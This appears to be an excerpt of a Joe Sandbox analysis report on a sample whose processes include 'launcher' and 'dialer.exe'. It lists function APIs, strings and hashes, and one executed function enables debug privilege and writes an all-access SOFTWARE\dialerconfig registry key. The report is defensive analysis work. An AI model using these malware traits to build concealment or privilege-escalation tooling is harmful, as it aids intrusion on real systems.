Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits
String ID: [json.exception.
API String ID: 1158913984-791563284
Opcode ID: 4e0e8a8d9bfcf9aa56a5d6d27ffab56b0dda19acec6d00a9619afca523a4cbdd
Instruction ID: 1de558c091d556b8bb65757d44fb28f1cc1e932b24a8de57db824236f9ff3cd1
Opcode Fuzzy Hash: 4e0e8a8d9bfcf9aa56a5d6d27ffab56b0dda19acec6d00a9619afca523a4cbdd
Instruction Fuzzy Hash: A241C463A3865181E710EB29D4512BDEBA5EB95BC0FE44131EA8D43B9ACF3CF145C760

Function 00007FF77E08A800 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF77E08A83F

Part of subcall function 00007FF77E08E1A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E1CF
Part of subcall function 00007FF77E08E1A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E1E9
Part of subcall function 00007FF77E08E1A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E222
Part of subcall function 00007FF77E08E1A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E2B3
Part of subcall function 00007FF77E08E1A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E2C4
Part of subcall function 00007FF77E08E1A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E2DE
Part of subcall function 00007FF77E08E1A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E311
Part of subcall function 00007FF77E08E1A0: ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,00000000,00000000,00000000,?,?,00007FF77E08A851), ref: 00007FF77E08E33E
Part of subcall function 00007FF77E08E1A0: std::_Facet_Register.LIBCPMT ref: 00007FF77E08E373

char_traits.LIBCPMTD ref: 00007FF77E08A85C

Part of subcall function 00007FF77E094FC0: _Min_value.LIBCPMTD ref: 00007FF77E094FFD

Part of subcall function 00007FF77E09FF40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF77E09F7B7), ref: 00007FF77E09FF5A

Strings

^[a-zA-Z0-9\s\\\:\_\-\.\,\;\$\#\[\]\{\}]+$, xrefs: 00007FF77E08A852

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: Lockit@std@@$??0_Bid@locale@std@@Getgloballocale@locale@std@@Locimp@12@$??1_D@std@@Facet_Getcat@?$ctype@Init@locale@std@@Locimp@12@_Min_valueRegisterV42@@Vfacet@locale@2@char_traitsmallocstd::_
String ID: ^[a-zA-Z0-9\s\\\:\_\-\.\,\;\$\#\[\]\{\}]+$
API String ID: 3710999844-217427379
Opcode ID: 1709994e50f07986ad022062a3678a368c1335b4223af4b5aea60a4dcf9339df
Instruction ID: ad9ff18c8179de6b133de78196d6eec10389c2a7d572b2f46f9b619911af1614
Opcode Fuzzy Hash: 1709994e50f07986ad022062a3678a368c1335b4223af4b5aea60a4dcf9339df
Instruction Fuzzy Hash: 2D515D33B24B818AE700DFA0E8502AC73B5F798748F515139EE8D27B59DF38A1A1C394

Function 000001EDF1670604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001EDF167071B
GetLastError.KERNEL32 ref: 000001EDF167073D

Strings

U, xrefs: 000001EDF16706C7

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: de7e971b84ac85e37a62f78cd29ed8b8a95d2dedc0b4c8763e60b3a18397db49
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: A041B172214A8081EB20CF35F4543EEA7E0F38A784F504225EE8E8778ADF39C442CB50

Function 00007FF77E0830A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99fileCOMMON

Download Yara Rule

APIs

?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z.MSVCP140 ref: 00007FF77E0831A4
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E083219

Strings

, xrefs: 00007FF77E083159

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: ?unshift@?$codecvt@Mbstatet@@Mbstatet@@@std@@fwrite
String ID:
API String ID: 1347553915-3916222277
Opcode ID: 5512a830a6eaa9a47a979440fa000aa61e48367804715fd3d195af7d45a79174
Instruction ID: 8b202b78a33203a8c6db2a21153104aef5342d89a36415b5027e3724731c6372
Opcode Fuzzy Hash: 5512a830a6eaa9a47a979440fa000aa61e48367804715fd3d195af7d45a79174
Instruction Fuzzy Hash: A751F63762D781C6EA609B19E44436ABBA0FBD5B40F601136EA8D43BA8DF7CE444CF10

Function 00007FF77E095760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E08B6C0: allocator.LIBCONCRTD ref: 00007FF77E08B77B

char_traits.LIBCPMTD ref: 00007FF77E095806
char_traits.LIBCPMTD ref: 00007FF77E09583D

Strings

parse error, xrefs: 00007FF77E0957FF, 00007FF77E09580E

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits$allocator
String ID: parse error
API String ID: 132031878-316136553
Opcode ID: 3b5c5888e1ffb491aaeb6d5cdec981a7474b3227bdaa44418ff4a71b1010b027
Instruction ID: 247118d8c04e7dd29dc0f87769c05dbfdd314c9f5af54c034104379de0ca5a46
Opcode Fuzzy Hash: 3b5c5888e1ffb491aaeb6d5cdec981a7474b3227bdaa44418ff4a71b1010b027
Instruction Fuzzy Hash: 81314D67A38A8181EA04FB12A4451BEA765FB55BC0F904531EE8E17BA6DF3CF141C3A0

Function 00007FF77E086C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77E088090: char_traits.LIBCPMTD ref: 00007FF77E0880B3

Part of subcall function 00007FF77E0866E0: char_traits.LIBCPMTD ref: 00007FF77E086771

_CxxThrowException.VCRUNTIME140 ref: 00007FF77E086CA5
__std_exception_copy.VCRUNTIME140 ref: 00007FF77E086CDD

Part of subcall function 00007FF77E0865B0: _Max_value.LIBCPMTD ref: 00007FF77E086617
Part of subcall function 00007FF77E0865B0: _Min_value.LIBCPMTD ref: 00007FF77E086636
Part of subcall function 00007FF77E0865B0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00007FF77E0863F2), ref: 00007FF77E08666A

Part of subcall function 00007FF77E0865B0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,00007FF77E0863F2), ref: 00007FF77E0866A6
Part of subcall function 00007FF77E0865B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF77E0866D4

Strings

current_path(), xrefs: 00007FF77E086C69

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traitsmemcpy$Concurrency::cancel_current_taskExceptionMax_valueMin_valueThrow__std_exception_copy
String ID: current_path()
API String ID: 2372020657-2752361316
Opcode ID: 0977dab33b57760ae02b7a9080c1cccde6bd1fefb4998b87d3e5ed795e26e6b2
Instruction ID: 263001eb26e91ed99e38d77ea8bc1c10548bbdfeebabe3050af6b2e360d1b0f7
Opcode Fuzzy Hash: 0977dab33b57760ae02b7a9080c1cccde6bd1fefb4998b87d3e5ed795e26e6b2
Instruction Fuzzy Hash: 89210163A28A8AA1DB11AF24E5411E9A330FB54748FE09132D78C13565FF2CF6E9C750

Function 00007FF77E08C548 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF77E08C5AB

Part of subcall function 00007FF77E087EA0: memset.VCRUNTIME140 ref: 00007FF77E087ED4

Strings

0, xrefs: 00007FF77E08C5D7
null, xrefs: 00007FF77E08C561

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: _dsignmemset
String ID: 0$null
API String ID: 210716287-2239106201
Opcode ID: 9dbfc879e01b5b83259e5948258bdc910671bd62ba53eca30885b21f8d72ca8d
Instruction ID: 47b0deba855bc7497444584464908b304b46396a6bfec5c1b25a995d504c3725
Opcode Fuzzy Hash: 9dbfc879e01b5b83259e5948258bdc910671bd62ba53eca30885b21f8d72ca8d
Instruction Fuzzy Hash: D4215123638B8585D641AF25E0401AEE760FF85B84FA59136EF8E53664DF3CE485C721

Function 000001EDF166D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001EDF166D6F9
LCMapStringW.KERNEL32 ref: 000001EDF166D781

Strings

LCMapStringEx, xrefs: 000001EDF166D6DC, 000001EDF166D6ED

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 2647e3338e58ff7ff4bca195948294685091714c1b4847f642d693e251655a83
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 87111A36608BC086D760CB26F48029AB7A4F7CAB90F544126EECE87B5ADF38C451CB00

Function 000001EDF16694A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001EDF16694E8
RaiseException.KERNEL32 ref: 000001EDF166952E

Strings

csm, xrefs: 000001EDF166951B

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 83d345e40cc0a60231a8fe35f6d06375f8047a0aa3fe72eb00c5fe074f77bd2b
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 69110A32219BC082EB61CB25F45029D77E5F789B98F184221DE8E0BB6ADF38C556CB40

Function 00007FF77E097CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E097D30
char_traits.LIBCPMTD ref: 00007FF77E097D4D

Strings

cannot use operator[] with a string argument with , xrefs: 00007FF77E097D29, 00007FF77E097D38

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits
String ID: cannot use operator[] with a string argument with
API String ID: 1158913984-2766135566
Opcode ID: de640fdc65c26857401d9df47ee5953c86feffac64f12ae8f2af07d5420e1b87
Instruction ID: 1e2a083b8dd02aba57ab00a3209be4b7d46edc581e50f926e2ca0c062ad32e3c
Opcode Fuzzy Hash: de640fdc65c26857401d9df47ee5953c86feffac64f12ae8f2af07d5420e1b87
Instruction Fuzzy Hash: 5D01A266A3C64541EA00BB21E5502BEA751EF95BE4FA44330DAAD077DACF7CE005C750

Function 00007FF77E09F300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00007FF77E09F350
char_traits.LIBCPMTD ref: 00007FF77E09F36D

Strings

type must be string, but is , xrefs: 00007FF77E09F349, 00007FF77E09F358

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: char_traits
String ID: type must be string, but is
API String ID: 1158913984-1861512233
Opcode ID: 56324a42e09ee002a050a054f576d8373aa4b3f517e957f060a00eca1e3fd59e
Instruction ID: 5e93b0d9c91b3854b8cb0be7ce641ee025430ca9df9f14d65928241e37d1c56c
Opcode Fuzzy Hash: 56324a42e09ee002a050a054f576d8373aa4b3f517e957f060a00eca1e3fd59e
Instruction Fuzzy Hash: 4F014F62A3868541EA00BB21E5502BEA651EB95BE4FE44330DA6D077D6CF6CE0018750

Function 000001EDF166D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001EDF166D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000001EDF166D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000001EDF166D681

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 9d53652dfdc80efb0a6572ecb6638c2acec3161bf4f8485667ecb57cbfab1b49
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 66F082327107D092E715DB61F4446DD63A1EB89B90F589226EE9B07B5BCE38C996CB00

Function 000001EDF166D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001EDF166D631
TlsSetValue.KERNEL32 ref: 000001EDF166D648

Strings

FlsSetValue, xrefs: 000001EDF166D61E

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 7ebcc83c73f956b46148ab0ae78bbbf51f73e552e9ca527172f0dc59b620c507
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: ACE092722006C0D1EB04CB70F8086DC23E2BB89B80F588232DE5B0A357CE38C897CB00

Function 000001EDF163CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001EDF163CBC5

Strings

November, xrefs: 000001EDF163CBA8, 000001EDF163CBB2
October, xrefs: 000001EDF163CBBE

Memory Dump Source

Source File: 00000006.00000002.3728534436.000001EDF1630000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001EDF1630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1630000_launcher.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 519400ff278eb4f516f4b7b062029ac360e4d649e65cb449c12bf21bb21c9fdc
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 0AE06D313009C192EA08DB71F4413EC62A29B96744F595022AD1B07357CF38C9C79200

Function 000001EDF1661D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EDF1661D9B
HeapAlloc.KERNEL32 ref: 000001EDF1661DAA
GetProcessHeap.KERNEL32 ref: 000001EDF1661E1E
HeapFree.KERNEL32 ref: 000001EDF1661E2C

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 6cc9ad292e9f582aab6d553fcd9943f46ad3b620cc66a932042f1ed32f225653
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 2A214F36605BD086EA11CF6AF40429EB3E0FBC9B94F154115EE8E4BB26EE78C5578700

Function 000001EDF1661274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EDF166127A
HeapAlloc.KERNEL32 ref: 000001EDF1661289
GetProcessHeap.KERNEL32 ref: 000001EDF16612A3
HeapAlloc.KERNEL32 ref: 000001EDF16612B4

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 7eda442ffabe58a5628b310aee79fd61a0b0c9b34950a57a2a79e9f382a03d46
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 16E0C971611640C6E704DB76F81439977E1EB89B52F498124CD4A07352EF7DC49AC750

Analysis Process: dialer.exePID: 5852, Parent PID: 4088COMMON

Execution Graph

Execution Coverage:	48%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31%
Total number of Nodes:	232
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF62DC32328 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 194
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62DC32078: StrCpyW.SHLWAPI ref: 00007FF62DC320AA
Part of subcall function 00007FF62DC32078: StrCatW.SHLWAPI ref: 00007FF62DC320B8
Part of subcall function 00007FF62DC32078: GetModuleHandleW.KERNEL32 ref: 00007FF62DC320C1
Part of subcall function 00007FF62DC32078: GetCurrentProcess.KERNEL32 ref: 00007FF62DC3210C
Part of subcall function 00007FF62DC32078: K32GetModuleInformation.KERNEL32 ref: 00007FF62DC32120
Part of subcall function 00007FF62DC32078: CreateFileW.KERNELBASE ref: 00007FF62DC32150
Part of subcall function 00007FF62DC32078: CreateFileMappingW.KERNELBASE ref: 00007FF62DC3217B
Part of subcall function 00007FF62DC32078: MapViewOfFile.KERNELBASE ref: 00007FF62DC3219F
Part of subcall function 00007FF62DC32078: lstrcmpiA.KERNEL32 ref: 00007FF62DC321EA
Part of subcall function 00007FF62DC32078: CloseHandle.KERNELBASE ref: 00007FF62DC32258
Part of subcall function 00007FF62DC32078: CloseHandle.KERNEL32 ref: 00007FF62DC32261
Part of subcall function 00007FF62DC32078: FreeLibrary.KERNEL32 ref: 00007FF62DC3226A

VerSetConditionMask.NTDLL ref: 00007FF62DC32397
VerSetConditionMask.NTDLL ref: 00007FF62DC323A8
VerSetConditionMask.NTDLL ref: 00007FF62DC323B9
VerifyVersionInfoW.KERNEL32 ref: 00007FF62DC323CC
GetCurrentProcessId.KERNEL32 ref: 00007FF62DC323DE
OpenProcess.KERNEL32 ref: 00007FF62DC323EE
OpenProcessToken.ADVAPI32 ref: 00007FF62DC3240F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF62DC32429
AdjustTokenPrivileges.KERNELBASE ref: 00007FF62DC3246D
GetLastError.KERNEL32 ref: 00007FF62DC32477
CloseHandle.KERNELBASE ref: 00007FF62DC32480
FindResourceExA.KERNEL32 ref: 00007FF62DC32494
SizeofResource.KERNEL32 ref: 00007FF62DC324AB
LoadResource.KERNEL32 ref: 00007FF62DC324C4
LockResource.KERNEL32 ref: 00007FF62DC324D6
GetCurrentProcessId.KERNEL32 ref: 00007FF62DC324E3
RegCreateKeyExW.KERNELBASE ref: 00007FF62DC32524
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF62DC32557
RegSetKeySecurity.KERNELBASE ref: 00007FF62DC32574
LocalFree.KERNEL32 ref: 00007FF62DC32581
RegCreateKeyExW.KERNELBASE ref: 00007FF62DC325B9
GetCurrentProcessId.KERNEL32 ref: 00007FF62DC325C3
RegSetValueExW.KERNELBASE ref: 00007FF62DC325F1
RegCloseKey.KERNELBASE ref: 00007FF62DC325FC
RegCloseKey.ADVAPI32 ref: 00007FF62DC32607
CreateThread.KERNELBASE ref: 00007FF62DC32628
GetProcessHeap.KERNEL32 ref: 00007FF62DC3262E
HeapAlloc.KERNEL32 ref: 00007FF62DC3263D
CreateThread.KERNELBASE ref: 00007FF62DC3266C
CreateThread.KERNELBASE ref: 00007FF62DC3268D
SleepEx.KERNELBASE ref: 00007FF62DC32695

Strings

SeDebugPrivilege, xrefs: 00007FF62DC32422
SOFTWARE\dialerconfig, xrefs: 00007FF62DC324FF
pid, xrefs: 00007FF62DC32596
svc64, xrefs: 00007FF62DC325CE
kernel32.dll, xrefs: 00007FF62DC323D2
DLL, xrefs: 00007FF62DC32486
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF62DC32550
ntdll.dll, xrefs: 00007FF62DC3233B

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 2439791646-1130149537
Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction ID: 74ba4a2e43f6bd5cebea03c190c49fe4b10fb95f0bfafc516a5415495c499b67
Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction Fuzzy Hash: 15A1FA35B08B8286EFA08F69EC442E973B9FB84755F408135D98D87668EF3CD14AC711

Function 00007FF62DC310C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

